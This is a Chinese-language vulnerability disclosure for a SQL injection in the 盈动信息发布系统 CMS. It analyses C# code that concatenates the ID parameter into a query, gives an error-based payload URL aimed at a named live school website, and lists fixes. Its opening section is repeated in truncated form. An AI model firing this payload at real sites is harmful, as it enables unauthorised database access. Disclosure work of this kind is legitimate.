### 0x01 漏洞框架 系统:盈动信息发布系统 盈动信息发布系统为杭州东方盈动计算机网络工程有限公司一款cms产品。 注入: 问题文件:/sites/main/LRXZ.aspx 问题参数:ID ### 0x02 漏洞详情 代码分析: ``` protected void Page_Load(object sender, EventArgs e) { 略... string text; if (this.Page.Request.QueryString["ID"] != null) { text = this.Page.Request.QueryString["ID"];/*获取参数*/ } else { text = "465"; } this.lblID.Text = text; string condition = "ClassID='" + this.lblID.Text + "' AND WebID=1 AND Deleted='0'";/*直接拼接SQL*/ this.GetPageInfo(condition);/*注入A*/ this.BindData(condition);/*注入B*/ } } ``` this.GetPageInfo分析: ``` private void GetPageInfo(string condition) { SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr()); SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection); sqlCommand.CommandType = CommandType.StoredProcedure; sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles"; sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize();...
### 0x01 漏洞框架 系统:盈动信息发布系统 盈动信息发布系统为杭州东方盈动计算机网络工程有限公司一款cms产品。 注入: 问题文件:/sites/main/LRXZ.aspx 问题参数:ID ### 0x02 漏洞详情 代码分析: ``` protected void Page_Load(object sender, EventArgs e) { 略... string text; if (this.Page.Request.QueryString["ID"] != null) { text = this.Page.Request.QueryString["ID"];/*获取参数*/ } else { text = "465"; } this.lblID.Text = text; string condition = "ClassID='" + this.lblID.Text + "' AND WebID=1 AND Deleted='0'";/*直接拼接SQL*/ this.GetPageInfo(condition);/*注入A*/ this.BindData(condition);/*注入B*/ } } ``` this.GetPageInfo分析: ``` private void GetPageInfo(string condition) { SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr()); SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection); sqlCommand.CommandType = CommandType.StoredProcedure; sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles"; sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize(); sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = 1; sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = true; sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将有问题的sql代入Get_SiteData_ByPagination存储过程*/ sqlConnection.Open(); this.PageInfo.set_RecordCount((int)sqlCommand.ExecuteScalar()); sqlConnection.Close(); } ``` this.BindData分析: ``` private void BindData(string condition) { this.mydatalist.DataSource = this.CreateSource(condition);/*跟进此方法*/ 略... } this.CreateSource: private ICollection CreateSource(string condition) { SqlConnection sqlConnection = new SqlConnection(Globals.get_ConnectStr()); SqlCommand sqlCommand = new SqlCommand("Get_SiteData_ByPagination", sqlConnection); sqlCommand.CommandType = CommandType.StoredProcedure; sqlCommand.Parameters.Add("@TblName", SqlDbType.NVarChar, 255).Value = "Articles"; sqlCommand.Parameters.Add("@PageSize", SqlDbType.Int).Value = this.PageInfo.get_PageSize(); sqlCommand.Parameters.Add("@PageIndex", SqlDbType.Int).Value = this.PageInfo.get_CurrentPageIndex(); sqlCommand.Parameters.Add("@DoCount", SqlDbType.Bit).Value = false; sqlCommand.Parameters.Add("@FldName", SqlDbType.NVarChar, 255).Value = "OnTop DESC, UpdateTime"; sqlCommand.Parameters.Add("@KeyFld", SqlDbType.NVarChar, 255).Value = "NewsID"; sqlCommand.Parameters.Add("@OrderType", SqlDbType.Bit).Value = true; sqlCommand.Parameters.Add("@StrWhere", SqlDbType.NVarChar, 1500).Value = condition;/*将问题SQL直接代入 Get_SiteData_ByPagination*/ SqlDataAdapter sqlDataAdapter = new SqlDataAdapter(sqlCommand); DataSet dataSet = new DataSet("GuestList"); sqlConnection.Open(); sqlDataAdapter.Fill(dataSet, "Guest"); sqlConnection.Close(); return dataSet.Tables["Guest"].DefaultView; } ``` 漏洞利用: http://www.jhjdedu.org/sites/main/LRXZ.aspx?id=2'and 1=@@version and'1'='1  Pocsuite:  ### 0x03 修复方式 1、过滤漏洞文件参数 2、使用加速乐等防护产品
